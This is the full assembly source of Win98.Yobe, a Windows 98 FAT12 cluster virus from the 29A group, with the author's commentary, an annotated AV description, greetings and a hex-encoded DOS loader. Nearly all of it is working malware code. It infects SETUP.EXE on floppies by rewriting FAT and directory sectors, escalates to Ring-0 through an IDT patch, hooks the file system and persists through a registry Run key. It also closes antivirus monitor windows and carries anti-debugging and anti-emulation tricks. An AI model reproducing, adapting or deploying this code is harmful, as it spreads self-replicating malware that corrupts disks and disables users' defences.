?????????????????????????????????????????????????????????????????[yobe.asm]???
;						      ??????? ??????? ???????
;                                                     ??? ??? ??? ??? ??? ???
;          Win98.Yobe.24576	                      ??????  ??????? ???????
;          by Benny/29A                               ??????? ??????? ??? ???
;                                                     ??????? ??????? ??? ???
;                                                    
;
;
;Author's description
;?????????????????????
;
;Hey reader! R u st0ned or drunk enough? If not, then don't read this, coz this
;is really crazy. Let me introduce u FIRST FAT12 infector (cluster/directory
;virus, this is also used to call), fully compatible with windozes (Win98)!
;No no, that's not enough. This is also resident, multithreaded in both of
;Ring-0 and Ring-3 levels with anti-debugging, anti-heuristic, anti-emulator and
;anti-monitor features, using Win9X backdoor to call DOS services and working
;with CRC32, Windows registry and API functions.
;Among all these features, I don't hope it has any chances to spread outta
;world. It infects only diskettes (A: only) and only one file - SETUP.EXE. More
;crazy than u thought, nah? Yeah, I'm lazy so I didn't want to test my code on
;my harddisk and I also didn't want to think about infication of more than one
;file. When I finished Win98.BeGemot, I was totally b0red of those stupid PE
;headerz, RVAs and such like. I wanted to code something really original, not
;next average-b0ring virus. I hope I successed. This virus doesn't demonstrate
;only porting old techniques (c Dir-II virus) to new enviroment, but also
;hot-new techniques (e.g. Ring0 threads). To be this virus really heavilly
;armoured is missing some poly/meta engine. Unfortunately, this conception of
;virus doesn't allow me to implement such engines (neither compression), coz
;I can't modify virus code. However, I included many usefull trix to fool
;debuggerz as well as heuristic scannerz. Bad thing is that this babe is
;detectable by NODICE32 - NODICE32 can find suspicious code (such as modifying
;IDT) and so it immediately reports an unknown virus. There ain't chance to
;improve it, coz I can't use any kind of encryption. Fortunately, other AVs
;find sh!t :D. I hope u will like this piece of work (it took me much time to
;code it, albeit it is very small (code is small, headerz r huge :) and
;optimized) and u will learn much from that. U want probably ask me, why I didn't
;coded stealth virus. U r right, It's easy to implement full-stealth mechanism,
;but, but, ... I won't lie u - I'm lazy :).
;Gimme know, if u will have any comments, if u will find any bugs or anything
;else...thnx.
;
;
;
;What will happen on execution ?
;???????????????????????????????-
;
;Virus will:
;1)	Setup up SEH frame
;2)	Check for CRC32 of virus body
;3)	Check for application level debugger
;4)	Reset SEH frame and run anti-heuristic code
;5)	Kill some AV monitors (AVP, AMON) + some anti-heuristic code
;6)	Check for SoftICE
;7)	Copy virus to internal buffer, create new Ring-3 thread and wait for
;	its termination
;8)	-	Jump to Ring-0 (via IDT)
;9)	-	Check for residency and install itself to memory
;10)	-	Quit from Ring-0
;11)	Restore host
;12)	Execute host
;13)	Restore host, so host will be infected again
;14)	Set registry key, so virus will be executed everytime windows will
;	start
;15)	Check for payload activation time
;16)	-	Do payload
;17)	Remove SEH frame and quit
;
;
;Virus in memory will:
;1)	Check file name
;2)	Create new Ring-0 thread and wait for its termination
;3)	-	Check for drive parameters (BOOT sector check)
;4)	-	Check for free space (FAT check)
;5)	-	Redirect cluster_ptr in directory structure (ROOT)
;6)	-	Write virus to the end of DATA area
;7)	-	Save back FAT, ROOT and SAVE area (internally used by virus)
;8)	-	Terminate Ring-0 thread
;9)	Pass control to next IFS hooker
;
;
;
;Payload
;????????
;
;In possibility 1:255, virus will show icon on the left side of the screen and
;will rotate with it. U will c, how light-snake will be rolled on the screen.
;User will be really impressed! X-D I still can't stop watching it, it really
;hipnotized me ! :DDDDD.
;
;
;
;Known bugs
;???????????
;
;My computer will sometimes hang while system will try to read infected file.
;Maybe old FD drive, maybe some bugz in virus code. This appear only on my
;computer, so I hope it is error on my side.
;
;
;
;AVP's description
;??????????????????
;
;Benny's notes: This is much better description than at BeGemot virus. However,
;I would have some notes, see [* *] marx:
;
;
;Win95.Yobe [* Fully compatible with Win98, so why Win95? *]
;
;This is a dangerous [* why dangerous?! *] memory resident parasitic Windows
;virus. It uses system calls that are valid under Win95/98 only and can't spread
;under NT. The virus also has bugs and often halts the system when run [* when,
;where, why? *]. Despite on this the virus has very unusual way of spreading,
;and it is interesting enough from technical point of view [* I hope it is *].
;The virus can be found only in two files: "SETUP.EXE" on floppy disks and
;"SETUP .EXE" in the root of the C: drive (there is one space between file name
;and ".EXE" extension). 
;
;On the floppy disks the virus uses a trick to hide its copy. It writes its
;complete code to the last disk sectors and modifies the SETUP.EXE file to read
;and execute this code.
;
;The infected SETUP.EXE file looks just as 512 bytes DOS EXE program, but it is
;not. While infecting this file the virus uses "DirII" virus method: by direct
;disk sectors read/write calls the virus gets access to disk directory sectors,
;modifies "first file cluster" field and makes necessary changes in disk FAT
;tables. As a result the original SETUP.EXE code is not modified, but the
;directory entry points to virus code instead of original file clusters. 
;
;When the infected SETUP.EXE is run from the affected floppy disk this DOS
;component of the virus takes control, reads the complete virus body from the
;last sectors on the floppy disk, then creates the "C:\SETUP .EXE" file, writes
;these data (complete virus code) to there and executes. The virus installation
;routine takes control then, installs the virus into the system and disinfect
;the SETUP.EXE file on the floppy drive. 
;
;While installing itself into the system the virus creates [* opens *] the new
;key in the system registry to activate itself on each Windows restart: 
;
; HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
;  YOBE=""C:\SETUP .EXE" YOBE"
;
;The virus then switches to the Windows kernel level (Ring0), allocates a block
;of system memory, copies itself to there and hooks disk file access Windows
;functions (IFS API). This hook intercepts file opening calls and on opening
;the SETUP.EXE file on the A: drive the virus infects it. 
;
;The virus has additional routines. First of them looks for "AVP Monitor" and
;"Amon Antivirus Monitor" windows and closes them; the second one depending on
;random counter displays the line with the words "YOBE" to the left side of the
;screen [* this is usually called as payload :D *].
;
;
;
;Greetz
;???????
;
;	B0z0		-	Huh, guy, why don't u stay in VX and write
;				another Padania virus? Just last one ;))
;	Billy Belcebu	-	Come to .cz! :D
;	BitAddict	-	Nice to met ya. Kewl to met old TriDenTer.
;	Darkman		-	Thank u for that wonderful book. It really
;				r0x0r!!!
;	Eddow		-	Would like to meet ya on IRC!
;	GriYo		-	Hey man, just reply me once.
;	Itchi		-	Drink, smoke and fuck again! :) Be back and
;				learn to code, pal!
;	Kaspersky	-	U cocksucker, where did u lose the description
;				of BeGemot?!!
;	Reptile		-	Smoke, smoke, smoke. This virus is really
;				st0ned :D. Btw, still working on macro stuph? ;)
;	StarZer0	-	Bak infectorz aren't problem :D. Now, when I
;				finished FAT12 inf., I will try to code
;				multithreaded .txt infector ;)))
;			-	Fibers r cool, but threads rulez!!!
;	The_Might       -\
;	MidNyte		- >	F0rk me a joint pleeeeeeaaazzzzz! :D
;	Rhape97         -/
;	All-nonsmokerz	-	Why do u drink and drive, when u can smoke
;				and fly? X-DDD
;	W33D		-	Thanx for inspiration, this virus is yourz,
;				hehe :D.
;	iKX stuph	-	Great work, men!!! XiNE#4 r0x0r!	
;
;
;
;How to build
;?????????????
;
;brcc32 yobe.rc
;tasm32 -ml -q -m9 yobe.asm
;tlink32 -Tpe -c -x -aa yobe,,, import32,,yobe.res
;pewrsec yobe.exe
;
;
;
;Who is YOBE?
;???????????????????????????
;
;Many ppl will now laugh me (hi Darkman!, hi Billy!) :DD. Yobe was human, which
;role is situated in Bible. Nah, don't beat me, I'm not catholic. I only like
;stories and ppl in Bible. Yobe was human, which lost his religion. Ehrm,
;let's imagine it as "he stopped believing in what he believed". Story is all
;about that u shouldn't stop believe in what u believe. If u believe in better
;world, don't stop believing in it and do everything to become it truth, don't
;resignate. This ain't only about catholisism, it's about life and utophy.
;But NOW pick up your lazy ass and do anything, anything u think it's right,
;otherwise u won't get what u want!
;
;
;
;(c) 1999 Benny/29A. Enjoy!



.386p						;386 protected opcodez
.model flat					;flat model, 32bit offset


include win32api.inc				;include some structures


PC_WRITEABLE    equ     00020000h               ;equates used
PC_USER         equ     00040000h               ;in installation
PR_SHARED       equ     80060000h               ;stage
PC_PRESENT	equ	80000000h
PC_FIXED	equ	00000008h
PD_ZEROINIT	equ	00000001h

IFSMgr_GetHeap	equ     0040000Dh		;used services
IFSMgr_Ring0_FileIO	equ     00400032h
IFSMgr_InstallFileSystemApiHook equ     00400067h
UniToBCSPath	equ	00400041h
VMMCreateThread	equ	00010105h
VMMTerminateThread	equ	00010107h
_VWIN32_CreateRing0Thread	equ	002A0013h
IFSMgr_Ring0_FileIO	equ	00400032h


mem_size        equ     (virus_end-Start+0fffh+24576)/1000h
						;size of virus in memory

VxDCall macro  VxDService              		;macro to call VxDCall
        int     20h
        dd      VxDService
	endm


extrn CreateFileA:PROC				;import APIz used by virus
extrn DeviceIoControl:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleFileNameA:PROC
extrn ReadFile:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn CreateThread:PROC
extrn GetCommandLineA:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn LoadIconA:PROC
extrn GetDC:PROC
extrn DrawIcon:PROC
extrn IsDebuggerPresent:PROC
extrn FindWindowA:PROC
extrn PostMessageA:PROC



.data						;data section
	VxDName	db	'\\.\vwin32',0		;vwin32 driver name
	srcFile	db	'a:\setup.exe',0	;virus locations
	dstFile	db	'c:\setup.exe',0	;on disk
	regFile	db	'"C:\SETUP .EXE" '	;in registry
	regVal	db	'YOBE',0
regSize = $-regFile
	subKey	db	'Software\Microsoft\Windows\CurrentVersion\Run',0
	sICE	db	'\\.\SICE',0		;SoftICE driver name
	ShItTyMoNs:                    		;monitors to kill
		db	'AVP Monitor',0
		db	'Amon Antivirus Monitor',0
	lpsiStartInfo	db	64		;used by CreateProcessA
			db	63 dup (?)
	regCont:				;registers passed to API
	regEBX	dd	offset ROOT
	regEDX	dd	19
	regECX	dd	14
	regEAX	dd	?
	regEDI	dd	?
	regESI	dd	?
	regFLGS	dd	?
	tmp	dd	?			;variable requiered by API
	org tmp
	hKey	dd	?			;key to registry
	lppiProcInfo:
	hProcess	dd	?		;handle to new process
	hThread		dd	?		;handle to new thread
	dwProcessID	dd	?		;ID of process
	dwThreadID	dd	?		;ID of thread
	vbuffer	db	24576 dup (?)		;buffer filled with virus file
	org vbuffer
	fname	db	256 dup (?)		;name of virus file
ends						;end of data section


.code						;code section
Start:						;virus body starts here
	@SEH_SetupFrame 		;setup SEH frame
	mov esi, offset _crc_			;start of block
	mov edi, crc_end-_crc_			;size of block
	call CRC32				;check code integrity
	cmp eax, 0DACA92DCh			;CRC32 match?
_crc_=$
	jne r_exit				;no, quit (anti-breakpoint)
	call IsDebuggerPresent			;check if any application level
	test eax, eax				;based debugger is present
	jne exit				;yeah, quit - anti-debugger
	mov [eax], ebx				;cause stack overflow exception
	jmp r_exit				;- anti-emulator
seh_jmp:@SEH_RemoveFrame            		;reset SEH handler
	@SEH_SetupFrame 		;...
	mov eax, cs				;load CS selector
	xor al, al				;only LSB is set under WinNT
	test eax, eax				;is WinNT active
	je r_exit				;yeah, quit
	db	0d6h				;anti-emulator
	mov eax, esp				;save ESP to EAX
	push cs					;save CS to stack
	pop ebx					;get it back to EBX
	cmp esp, eax				;match?
	jne r_exit				;no, quit - anti-emulator

	mov eax, fs:[20h]			;get debugger context
	test eax, eax				;is there any?
	jne exit				;yeah, quit - anti-debugger

	mov esi, offset ShItTyMoNs		;pointer to stringz
        xor edi, edi                            ;to AV monitors
	push 2					;2 monitors
        pop ecx                                 ;...
KiLlMoNs:
	push ecx				;save counter
	push esi				;AV string
	push edi				;NULL
        call FindWindowA			;find window
        test eax, eax                           ;found?
        je next_mon                             ;no, try to kill other monitor
        push edi                                ;now we will send message
        push edi                                ;to AV window to kill itself
        push 12h                                ;veeeeeeery stupid X-DD
	push eax
        call PostMessageA			;bye bye, hahaha
next_mon:
        sub esi, -0ch                           ;next monitor string
	pop ecx					;restore counter
        loop KiLlMoNs                           ;kill another one, if present

	push cs					;store CS
	push offset anti_l			;store offset to code
	retf					;go there - anti-emulator

CRC32:  push ebx                                ;I found this code in Int13h's
        xor ecx, ecx                            ;tutorial about infectin'
        dec ecx                                 ;archives. Int13h found this
        mov edx, ecx                            ;code in Vecna's Inca virus.
NextByteCRC:                                    ;So, thank ya guys...
        xor eax, eax                            ;Ehrm, this is very fast
        xor ebx, ebx                            ;procedure to code CRC32 at
        lodsb                                   ;runtime, no need to use big
        xor al, cl                              ;tables.
	mov cl, ch
	mov ch, dl
	mov dl, dh
	mov dh, 8
NextBitCRC:
	shr bx, 1
	rcr ax, 1
	jnc NoCRC
	xor ax, 08320h
	xor bx, 0edb8h
NoCRC:  dec dh
	jnz NextBitCRC
	xor ecx, eax
	xor edx, ebx
        dec edi
	jne NextByteCRC
	not edx
	not ecx
	pop ebx
	mov eax, edx
	rol eax, 16
	mov ax, cx
	ret

anti_l:	mov edi, offset sICE			;pointer to SoftICE
	call OpenDriver				;try to open its driver
	jne exit				;SICE present, quit - anti-debugger
	
	mov esi, offset fname			;where to store virus filename
	push 256				;size of filename
	push esi				;ptr to filename
	push 400000h				;base address of virus
	call GetModuleFileNameA			;get virus filename
	test eax, eax				;error?
	je exit					;yeah, quit

	xor eax, eax
	push eax
	push eax
	push OPEN_EXISTING
	push eax
	push FILE_SHARE_READ
	inc eax
	ror eax, 1
	push eax
	push esi
	call CreateFileA			;open virus file
	inc eax					;error?
	je exit					;yeah, quit
	dec eax
	xchg eax, esi
	push 0
	push offset tmp
	push 24576				;size of virus file
	push offset vbuffer			;ptr to buffer
	push esi
	call ReadFile				;copy virus file to buffer
	push eax
	push esi
	call CloseHandle			;and close virus file
	pop ecx	
	jecxz exit

	xor eax, eax
	push offset tmp
	push eax
	push eax
	push offset NewThread
	push eax
	push eax         			;create new thread and let virus
	call CreateThread			;code continue there
	test eax, eax				;error?
	je exit					;yeah, quit
	mov word ptr [t_patch], 9090h		;allow execution of code -
	push eax				; - anti-emulator
	call CloseHandle			;close handle of thread
crc_end=$
e_patch:jmp $					;this will be patched by thread
						; - anti-emulator
exit:	call GetCommandLineA			;get command-line
	xchg eax, esi				;to esi
	lodsb					;load byte
	cmp al, '"'				;is it " ? If not, virus filename
	jne regSet				;ain't long one - anti-AVer
lchar:	lodsb					;load next byte
	cmp al, '"'				;is it " ?
	jne lchar				;no, continue
_lchar:	lodsb					;load byte
	cmp al, ' '				;is it space?
	je _lchar				;yeah, continue
	test al, al				;is there any parameter?
	jne regSet				;yeah, virus is loaded from
						;C: drive -> no jump to host

	mov edi, offset VxDName			;pointer to vwin32
	call OpenDriver				;open driver
	je regSet				;if error, quit
	dec eax
	mov [d_handle], eax			;store handle
	mov eax, offset ROOT			;buffer for reading ROOT
	push eax       				;save ptr
	call I25hSimple				;read ROOT
	pop ebp					;get it back
	jc c_exit				;if error, then quit

_f_cmp:	mov esi, ebp				;get ptr to ROOT
	push esi
	lodsd
	test eax, eax				;ZERO?
	pop esi
	je c_exit				;yeah, no more filez, quit

	push 11					;size of filename (8+3)
	pop edi					;to EDI
	call CRC32				;calculate CRC32
	cmp eax, 873F6A26h			;match?
	je _fn_ok				;yeah, try to restore file
	sub ebp, -20h				;no, get next directory record
	jmp _f_cmp				;and try again
_fn_ok:	mov edi, offset save			;load SAVE area sector from disk
	mov [regEBX], edi
	mov [regEDX], 2880-1			;SAVE area = last sector in disk
	mov [regECX], 1				;one sector to read
	call I25h				;read it
	jc c_exit				;if error, then quit

	push word ptr [ebp+1ah]			;store cluster_ptr
	push dword ptr [ebp+1ch]		;store filesize
	push word ptr [edi]			;restore cluster_ptr
	pop word ptr [ebp+1ah]			;...
	push dword ptr [edi+2]			;restore filesize
	pop dword ptr  [ebp+1ch]		;...
	call WriteROOT				;restore directory record
	pop dword ptr [ebp+1ch]			;restore filesize
	pop word ptr [ebp+1ah]			;restore cluster_ptr
	jc c_exit				;if error, then quit

	mov ebx, offset dstFile			;destination path+filename
	push 0
	push ebx
	push offset srcFile			;source path+filename
	call CopyFileA				;copy virus from A: to C: drive
	xchg eax, ecx				;error?
	jecxz err_cpa				;yeah, quit

	xor eax, eax
	push offset lppiProcInfo
	push offset lpsiStartInfo
	push eax
	push eax
	push eax
	push eax
	push eax
	push eax
	push eax
	push ebx
	call CreateProcessA			;execute original file (host)
	xchg eax, ecx				;error?
	jecxz err_cpa				;yeah, quit

	mov ebp, [hProcess]			;get handle of host process
	push -1					;wait for its signalisation
	push ebp				;...
	call WaitForSingleObject		;...
	
	push ebp
	call CloseHandle			;close handle of host process
	push dword ptr [hThread]
	call CloseHandle			;close handle of host thread

err_cpa:call WriteROOT				;restore ROOT
	push ebx
	call DeleteFileA			;and delete host from C: drive

c_exit:	push 12345678h				;get handle of vwin32 driver
d_handle = dword ptr $-4
	call CloseHandle			;and close it

regSet:	push offset tmp
	push offset hKey
	push 0
	push 3
	push 0
	push 0
	push 0
	push offset subKey
	push 80000002h
	call RegCreateKeyExA			;open registry
	test eax, eax
	jne r_exit

	push regSize
	push offset regFile
	push 1
	push 0
	push offset regVal
	mov ebx, dword ptr [hKey]
	push ebx           			;set key - virus will be executed
	call RegSetValueExA			;everytime Windows will start
	push ebx
	call RegCloseKey			;close registry

	dw	310fh				;RDTCS
	cmp al, 'Y'				;1:255 possibility
	jne r_exit				;payload won't be activated

payload:push 0					;payload will be activated
	call GetDC				;get device context of desktop
	xchg eax, ebx				;save HDC to EBX
	push 29ah				;ID of icon
	push 400000h				;base of virus
	call LoadIconA				;load icon
	xor edx, edx				;EDX=0
l_payload:
	pushad					;store all registers
	push eax				;icon handle
	push edx				;Y possition
	push 0					;X possition
	push ebx				;device context handle
	call DrawIcon				;draw icon on desktop
	popad					;restore all registers
	sub edx, -30				;increment Y possition
	loop l_payload				;long payload :)

r_exit:	@SEH_RemoveFrame			;remove SEH frame
	push 0
	call ExitProcess			;and exit

NewThread:
	pushad					;store all registers
t_patch:jmp $					;will be patched - anti-emulator
	call EnterRing0				;jmp to Ring-0
	pushad					;store all registers
	mov eax, dr0				;get debug register
	cmp eax, 'YOBE'				;check if we r already resident
	je quitR0				;yeah, quit

	push 24576
	VxDCall IFSMgr_GetHeap			;alocate memory for our virus
	pop edx					;correct stack
	xchg eax, edi				;get address to EDI
	test edi, edi				;error?
	je quitR0				;yeah, quit

	push edi				;copy virus file to memory
	mov esi, offset vbuffer			;from
	mov ecx, 24576/4			;how many
	rep movsd				;move!
	pop ebp
	
	mov [ebp + 600h+membase-Start], ebp	;save address
	lea eax, [ebp + 600h+NewIFSHandler-Start]
	push eax				;pointer to new handler
	VxDCall IFSMgr_InstallFileSystemApiHook	;install file system hook
	pop edx					;correct stack
	mov [ebp + 600h+OldIFSHandler-Start], eax
	mov eax, 'YOBE'				;mark debug register as "already
	mov dr0, eax				;resident flag" - anti-debugger
quitR0:	mov dword ptr [p_jmp], 90909090h	;patch code - anti-emulator
	popad					;restore all registers
	iretd					;and quit from Ring-0

EnterRing0:                                     ;Ring0 port
        pop eax                                 ;get address
        pushad                                  ;store registers
        sidt fword ptr [esp-2]                  ;load 6byte long IDT address
        popad                                   ;restore registers
        sub edi, -(8*3)                         ;move to int3
        push dword ptr [edi]                    ;save original IDT
        stosw                                   ;modify IDT
        inc edi                                 ;move by 2
        inc edi                                 ;...
        push dword ptr [edi]                    ;save original IDT
        push edi                                ;save pointer
        mov ah, 0eeh                            ;IDT FLAGs
        stosd                                   ;save it
        push ds                                 ;save some selectors
        push es                                 ;...
        int 3                                   ;JuMpToRiNg0!
        pop es                                  ;restore selectors
        pop ds                                  ;...
        pop edi                                 ;restore ptr
        add edi, -4                             ;move with ptr
        pop dword ptr [edi+4]                   ;and restore IDT
        pop dword ptr [edi]                     ;...
p_jmp:  inc eax                                 ;some silly loop to fool
        cdq                                     ;some AVs. Will be overwritten
        jmp p_jmp                               ;with NOPs l8r by int handler
	mov word ptr [e_patch], 9090h		;again, new overwriting of code
	popad					; - anti-emulator
	ret					;restore all registers and quit

OpenDriver:
	xor eax, eax
	push eax
	push 4000000h
	push eax
	push eax
	push eax
	push eax
	push edi
	call CreateFileA			;open driver
	inc eax					;increment handle
	ret					;quit

NewIFSHandler:					;file system handler
	enter 20h, 0				;reserve space in stack
	push dword ptr [ebp+1ch]		;for parameters
	push dword ptr [ebp+18h]
	push dword ptr [ebp+14h]		;store parameters
	push dword ptr [ebp+10h]		;for next handler
	push dword ptr [ebp+0ch]
	push dword ptr [ebp+08h]

	cmp dword ptr [ebp+0ch], 24h		;open?
	jne quitHandler				;no, quit

	pushad					;store all registers
	call gdlta				;get delta offset
gdelta:	db	0b8h				;prefix - anti-disassembler
gdlta:	pop ebx					;and anti-lamer

	xor ecx, ecx				;ECX=0
	mov cl, 1				;ECX=0 or 1
semaphore = byte ptr $-1
	jecxz exitHandler			;semaphore set? then quit
	mov byte ptr [ebx + semaphore - gdelta], 0
						;set semaphore
        lea edi, [ebx + filename - gdelta]	;get filename
	mov al, [ebp+10h]			;get disk no.
	dec al					;is it A: ?
	jne exitHandler				;no, quit
	mov al, 'A'				;add A letter
	stosb					;store it
	mov al, ':'				;add : letter
	stosb					;store it

wegotdrive:
	xor eax, eax
	push eax
	inc ah
	push eax
	mov eax, [ebp+1ch]
	mov eax, [eax+0ch]
	sub eax, -4
	push eax
	push edi
	VxDCall UniToBCSPath			;convert UNICOE filename to ANSI
	sub esp, -10h				;correct shitty stack
	mov byte ptr [edi+eax], 0		;and terminate filename with \0

	mov esi, edi
	dec esi
	dec esi
	xchg eax, edi
	inc edi
	inc edi
	inc edi
	call CRC32				;calculate CRC32 of filename
	cmp eax, 0B4662AD0h			;is it "A:\SETUP.EXE,0" ?
	je setup_exe				;yeah, continue

exitHandler:
	mov byte ptr [ebx + semaphore - gdelta], 1	;set semaphore
	popad						;restore all registers
quitHandler:
	mov eax, 12345678h
OldIFSHandler = dword ptr $-4
	call [eax]				;jump to next handler
	sub esp, -18h				;correct stack
	leave
	ret					;and quit

setup_exe:
	mov ecx, 1000h				;thread stack
	lea ebx, [ebx + Thread_Infect - gdelta]	;address of thread proc
	xor esi, esi				;next crappy parameter
	VxDCall _VWIN32_CreateRing0Thread	;create new Ring-0 thread
	jmp exitHandler				;and quit
						; - anti-everything
	db	0b8h				;prefix - anti-disassembler
Thread_Infect:					;Ring-0 thread proc
	pushad					;store all registers
	jmp ti_next				;jump over
	db	3 dup (?)			;leave code be overwritten
ti_next:call tigdelta				;get delta offset
ti_gdelta	db	0b8h			;next prefix
tigdelta:
	pop ebx
	xor ecx, ecx
	inc ecx
	lea esi, [ebx + BOOT - ti_gdelta]	;read BOOT sector
	call Int25h
	jc exit_thread

	cmp [ebx + BOOT+0bh - ti_gdelta], 01010200h	;check, if diskette is 
	jne exit_thread					;1,44MB, check FAT and
	cmp word ptr [ebx + BOOT+0fh - ti_gdelta], 0200h;ROOT possition
	jne exit_thread
	push 9
	pop ecx
	cmp word ptr [ebx + BOOT+16h - ti_gdelta], cx	;...
	jne exit_thread				;no, its not 1,44MB FD

	lea esi, [ebx + FAT - ti_gdelta]
	inc edx
	call Int25h				;read FAT
	cmp byte ptr [esi], 0f0h		;check if it is 1,44MB
	jne exit_thread				;no, quit


	lea edi, [ebx + FAT+4223 - ti_gdelta]	;check FAT, if last sectors r
	mov ebp, edi				;free
	xor eax, eax
sFAT:	scasd
	jne exit_thread				;no, quit
	loop sFAT

	mov edi, ebp				;now we will mark FAT, last
	inc edi					;sectors will be marked as
	mov eax, 0ff0ff00h			;RESERVED
	push 73					;coz we infect 12bit FAT, we
	pop ecx					;use this loop to mark it so
markFAT:ror eax, 8
	test al, al
	je markFAT
	stosb
	loop markFAT
	mov byte ptr [edi], 0fh			;mark end

	call ROOTinit
	call Int25h				;read ROOT

f_cmp:	mov esi, ebp				;get ptr to ROOT          
	push esi                              
	lodsd                                 
	test eax, eax				;ZERO?
	pop esi                               
	je exit_thread				;yeah, no more filez, quit

	push 11
	pop edi
	call CRC32				;calculate CRC32 of file
	cmp eax, 873F6A26h			;is it SETUP.EXE?
	je fn_ok                                ;yeah, continue
	sub ebp, -20h				;no, process next directory rec.
	jmp f_cmp				;...
fn_ok:	mov ax, [ebp+1ah]			;save cluster_ptr
	mov [ebx + save - ti_gdelta], ax
	mov eax, [ebp+1ch]			;save filesize
	mov [ebx + save+2 - ti_gdelta], eax
	mov word ptr [ebp+1ah], 2800		;new cluster_ptr
	mov dword ptr [ebp+1ch], 512		;new filesize

	xor ecx, ecx
	inc ecx
	lea esi, [ebx + loader - ti_gdelta]
	mov edx, 2880-49
	call Int26h				;write DOS loader

	push 42
	pop ecx
	mov esi, [ebx + membase - ti_gdelta]
	mov edx, 2880-48			;write virus
	call Int26h

	xor ecx, ecx
	inc ecx
	lea esi, [ebx + save - ti_gdelta]
	mov edx, 2880-1
	call Int26h				;write SAVE area

	call ROOTinit
	call Int26h				;write ROOT

	push 9
	pop ecx
	lea esi, [ebx + FAT - ti_gdelta]
	xor edx, edx
	inc edx
	pushad
	call Int26h				;write first FAT
	popad
	sub dl, -9
	call Int26h				;write second FAT

exit_thread:
	popad					;restore all registers
	ret					;and exit


ROOTinit:					;procedure to initialize
	push 14					;registers for reading/writing
	pop ecx					;ROOT
	push 19
	pop edx
	lea esi, [ebx + ROOT - ti_gdelta]
	mov ebp, esi
	ret

Int26h: mov eax, 0DE00h				;write sectors
	jmp irfio	
Int25h:	mov eax, 0DD00h				;read sectors
irfio:	VxDCall IFSMgr_Ring0_FileIO
	ret

WriteROOT:					;code used to write sectorz
	mov [regEBX], offset ROOT		;pointer to ROOT field
	mov [regEDX], 19			;sector number of ROOT
	mov [regECX], 14			;sectors to write
I26h:	mov [p2526], 3				;set WRITE mode
	jmp i2526				;continue
I25h:	mov [p2526], 2				;set READ mode
i2526:	and [regEAX], 0				;zero EAX
I25hSimple:
	push 0
	push offset tmp
	push 28
	push offset regCont
	push 28
	push offset regCont
	push 2
p2526 = byte ptr $-1
	push dword ptr [d_handle]
	call DeviceIoControl			;backdoor used to call DOS services
	xchg eax, ecx				;error?
	jecxz q2526h				;yeah, set CF and quit
	clc					;clear CF
	ret					;quit
q2526h:	stc					;set CF
	ret					;and quit


	loader:					;DOS loader
	include	loader.inc
	ldrsize = $-loader			;size of DOS loader
	membase	dd	'YYYY'		;address, where is virus placed in memory
	filename	db	100h dup ('Y')	;filename
	save	db	512 dup ('Y')		;save area
	BOOT	db	512 dup ('Y')		;BOOT
	FAT	db	4608 dup ('Y')		;FAT
	ROOT	db	7168 dup ('Y')		;ROOT
virus_end:					;virus ends here
ends						;end of code section
End Start					;thats all f0lx ;)
?????????????????????????????????????????????????????????????????[yobe.asm]???
???????????????????????????????????????????????????????????????[LOADER.INC]???
		dd 5A4Dh
		dd 1
		dd 5410010h
		dd 0FFFFh
		dd 0
		dd 0
		dd 1Ch
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 0
		dd 8EC0331Eh
		dd 901EC4D8h
		dd 1E892E00h
		dd 8C2E008Dh
		dd 0C7008F06h
		dd 9B009006h
		dd 920E8C00h
		dd 1F0E0E00h
		dd 2AB907h
		dd 0BB0B10BAh
		dd 25CD00CBh
		dd 0B8587258h
		dd 0DB33716Ch
		dd 0BAC93343h
		dd 9EBE0012h
		dd 7221CD00h
		dd 40B49346h
		dd 0B900CBBAh
		dd 21CD6000h
		dd 3EB43972h
		dd 2E0721CDh
		dd 0BF068Ch
		dd 48BB4AB4h
		dd 1E21CD05h
		dd 77168C06h
		dd 7C268900h
		dd 0B8070E00h
		dd 0BBBB4B00h
		dd 0ACBA00h
		dd 34B821CDh
		dd 0BCD08E12h
		dd 1F071234h
		dd 0ACBA41B4h
		dd 3321CD00h
		dd 66D88EC0h
		dd 34567868h
		dd 68F6612h
		dd 0B80090h
		dd 0B021CD4Ch
		dd 3A43CF03h
		dd 5445535Ch
		dd 2E205055h
		dd 455845h
		dd 535C3A43h
		dd 50555445h
		dd 452E317Eh
		dd 4558h
		dd 8100h
		dd 0FFFFFF00h
		dd 0FFFFFFFFh
		dw 0EFFh
		db    0
???????????????????????????????????????????????????????????????[LOADER.INC]???